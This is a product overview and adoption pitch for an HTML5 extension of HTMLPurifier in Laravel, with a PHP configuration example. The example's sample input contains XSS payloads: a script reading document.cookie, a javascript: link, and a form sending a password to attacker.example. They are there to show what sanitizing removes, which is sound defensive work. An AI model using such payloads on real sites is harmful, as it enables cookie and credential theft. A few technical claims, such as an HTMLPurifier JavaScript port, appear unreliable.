Htmlpurifier Html5 Laravel Package

xemlock/htmlpurifier-html5

HTML5 definitions and tidy/sanitization rules for HTML Purifier, aligned with the WHATWG spec. Purify and normalize dirty HTML5 into valid output with an HTML5-ready config, plus flexible directives (e.g., safely allow YouTube iframes).


Product Decisions This Supports

  • Secure Rich Text Editing: Enables Laravel applications to safely process user-generated HTML5 content (e.g., blog posts, wikis, or CMS entries) with full HTML5 element support while preventing XSS attacks. This directly addresses security and feature parity needs for modern web apps.
  • Build vs. Buy Decision: Eliminates the need to develop and maintain custom sanitization logic, reducing technical debt and leveraging a community-vetted, actively maintained solution. The package’s MIT license and Laravel-friendly Composer integration make adoption frictionless.
  • Roadmap Alignment for Semantic Web: Supports strategic initiatives like improving SEO (via semantic elements like <article>, <section>) and accessibility (WCAG compliance with proper HTML5 structure). Aligns with trends toward headless CMS and component-based architectures.
  • Use Cases:
    • Laravel-Based Content Platforms: Sanitize rich text inputs from editors like CKEditor or Quill while preserving HTML5 features (e.g., <figure>, <audio>).
    • Community-Driven Apps: Moderate user-submitted HTML (e.g., forums, Q&A) with granular controls (e.g., allow <iframe> only for YouTube via regex whitelisting).
    • APIs with HTML Payloads: Validate and sanitize HTML responses from third-party services (e.g., embedded widgets, social media cards) before rendering in Laravel views.
    • Legacy System Modernization: Gradually migrate from HTML4/XHTML sanitization to HTML5 without rewriting core logic.

When to Consider This Package

  • Adopt When:

    • Your Laravel app requires HTML5 compliance for modern features (e.g., semantic markup, media elements) but must strictly sanitize user input to prevent XSS.
    • You’re using Laravel’s Purifier facade or HTMLPurifier directly but need extended HTML5 support beyond legacy definitions (e.g., <dialog>, <track>).
    • Your stakeholders need fine-grained control over allowed elements/attributes (e.g., enabling <form> only in trusted contexts or whitelisting <iframe> sources).
    • You prioritize long-term maintainability: The package is actively updated (last release: 2026) and integrates seamlessly with Laravel’s ecosystem (Composer, service containers).
    • Your app handles user-generated HTML (e.g., comments, reviews) and requires both security and modern markup (e.g., allowing <video> but blocking malicious scripts).
  • Look Elsewhere If:

    • You need minimal sanitization (e.g., only basic formatting like <b>, <i>). Consider Laravel’s Str::markdown() or a lightweight library like ParagonIE/Sanitizer.
    • Your app doesn’t use HTML5 features (e.g., legacy systems or static content). The base HTMLPurifier may suffice, reducing dependency bloat.
    • You require client-side sanitization (e.g., real-time validation in SPAs). Pair this with a frontend library like DOMPurify or use HTMLPurifier’s JavaScript port.
    • Performance is critical for high-throughput APIs (e.g., processing thousands of requests/sec). Benchmark against alternatives like PHP’s filter_var() for simple cases or consider caching purified outputs.
    • You need custom sanitization rules that aren’t covered by HTML5 standards. This package is opinionated; extending it may require forked maintenance.

How to Pitch It (Stakeholders)

For Executives/Business Stakeholders:

*"This package lets us enable modern web features while keeping users safe. Here’s why it’s a no-brainer:

  • Unlock Richer Content: Allow users to embed videos, semantic layouts (<article>), and interactive elements (<dialog>) without security risks. Think YouTube comments, interactive tutorials, or accessible documentation—all while blocking XSS attacks.
  • Save Development Time: Instead of building and debugging custom sanitization (which is error-prone and costly), we’re using a battle-tested, HTML5-compliant solution maintained by the community. This reduces bugs and speeds up feature delivery.
  • Future-Proof the Platform: HTML5 is the standard for SEO and accessibility. By adopting this now, we align with WCAG guidelines and search engine best practices, reducing long-term compliance costs.
  • Example Impact: If we want to let users embed Tweets or YouTube videos in posts, we can whitelist trusted domains in a config line—no custom code needed. This directly supports our growth goals for user engagement and monetization.

Risk: Minimal. The package is MIT-licensed, Laravel-friendly, and actively maintained. We’re not betting on unproven tech—just leveraging existing tools smarter."*


For Engineering/Technical Stakeholders:

*"This is a drop-in upgrade for Laravel’s HTML purification that solves two critical problems:

  1. Modern HTML5 Support: Adds 20+ elements (e.g., <video>, <track>, <dialog>) and attributes (e.g., async for <script>) while maintaining strict sanitization. No more hacking around with regex or custom parsers.
  2. Granular Control: Configure allowed elements/attributes via Laravel’s config() or service container. Examples:
    • Allow <iframe> only for YouTube (set() returns null in HTML Purifier, so the calls are not chainable, and the regex is matched against the full src URI): $config->set('HTML.SafeIframe', true); $config->set('URI.SafeIframeRegexp', '%^https?://www\.youtube\.com/embed/%');
    • Restrict forms to trusted contexts: $config->set('HTML.Forms', false);
    • Enable semantic markup for SEO: Default config already supports <article>, <section>, etc.

Integration:

  • Works seamlessly with Laravel’s Purifier facade or HTMLPurifier service provider.
  • Replace your current HTMLPurifier config with HTMLPurifier_HTML5Config::createDefault() in one line.
  • Extend existing Laravel validation rules (e.g., ValidatedRequest) to use the new config.

Performance:

  • Minimal overhead compared to base HTMLPurifier (same core engine, just extended definitions).
  • Caching purified outputs (e.g., via Laravel’s cache) mitigates any runtime cost.

Migration Path:

  1. Start by replacing HTMLPurifier with xemlock/htmlpurifier-html5 in composer.json.
  2. Update config to use HTMLPurifier_HTML5Config (backward-compatible with most existing setups).
  3. Test edge cases (e.g., nested HTML5 elements, custom attributes) in staging.
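The configuration, integration and migration steps above, pulled together as one added PHP example. This is not code from the page or from the xemlock/htmlpurifier-html5 project; it assumes the package has been installed with Composer (which also pulls in ezyang/htmlpurifier), that the script runs from the project root where vendor/autoload.php lives, and the dirty HTML input is constructed for illustration. The video id and the hostile domain in the sample are placeholders.

```php
<?php
// Added example, not the package's own code. Assumes:
//   composer require xemlock/htmlpurifier-html5
// and a vendor/autoload.php next to this script.
require __DIR__ . '/vendor/autoload.php';

/**
 * Build an HTML5-aware purifier configuration.
 *
 * Note: HTMLPurifier_Config::set() returns null, so the directives are
 * applied one per statement rather than chained.
 */
function buildHtml5Purifier(): HTMLPurifier
{
    // HTML5 element/attribute definitions supplied by the package.
    $config = HTMLPurifier_HTML5Config::createDefault();

    // Allow <iframe>, but only when its src matches the YouTube embed URL.
    // The regexp is tested against the full URI, so the scheme and an
    // escaped dot in the host are included.
    $config->set('HTML.SafeIframe', true);
    $config->set(
        'URI.SafeIframeRegexp',
        '%^https?://(www\.)?youtube(-nocookie)?\.com/embed/%'
    );

    // Keep <form> and its controls out of untrusted content (this is the
    // default; it is set explicitly here to document the decision).
    $config->set('HTML.Forms', false);

    // Cache compiled definitions so the config is not rebuilt per request.
    // sys_get_temp_dir() is a stand-in; in Laravel use storage_path('app/purifier').
    $config->set('Cache.SerializerPath', sys_get_temp_dir());

    return new HTMLPurifier($config);
}

/**
 * Purify one untrusted HTML5 fragment.
 */
function purifyUserHtml(string $dirty): string
{
    static $purifier = null;
    if ($purifier === null) {
        $purifier = buildHtml5Purifier();
    }
    return $purifier->purify($dirty);
}

// Constructed sample input: legitimate HTML5 markup mixed with markup that
// a sanitizer must remove. The video id and attacker host are placeholders.
$dirty = <<<'HTML'
<article>
  <h1 onclick="alert(1)">Post title</h1>
  <figure>
    <img src="https://example.com/a.png" alt="diagram">
    <figcaption>A caption</figcaption>
  </figure>
  <iframe src="https://www.youtube.com/embed/VIDEO_ID"></iframe>
  <iframe src="https://attacker.example/frame"></iframe>
  <script>alert(document.cookie)</script>
  <a href="javascript:alert(1)">click me</a>
  <form action="https://attacker.example/steal"><input name="pw"></form>
</article>
HTML;

echo purifyUserHtml($dirty), PHP_EOL;
```

When run, the output should keep the <article>, <h1>, <figure>/<figcaption> and the YouTube <iframe>, while the onclick handler, the <script> element, the javascript: link target, the second <iframe> (its src fails URI.SafeIframeRegexp) and the <form> are dropped. That is the check to put into the staging step of the migration path: feed the app's own representative inputs through purifyUserHtml() and diff the result against what the previous HTMLPurifier configuration produced.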

Alternatives Considered:

  • Base HTMLPurifier: Lacks HTML5 support; would require custom definitions (higher maintenance).
  • DOMPurify (JS): Client-side only; doesn’t solve server-side sanitization needs.
  • Custom Regex: Unreliable for complex HTML5; prone to XSS vulnerabilities.

Recommendation: Adopt this package as part of our next major release cycle. It’s a low-risk, high-reward upgrade that enables features while reducing security risks."*
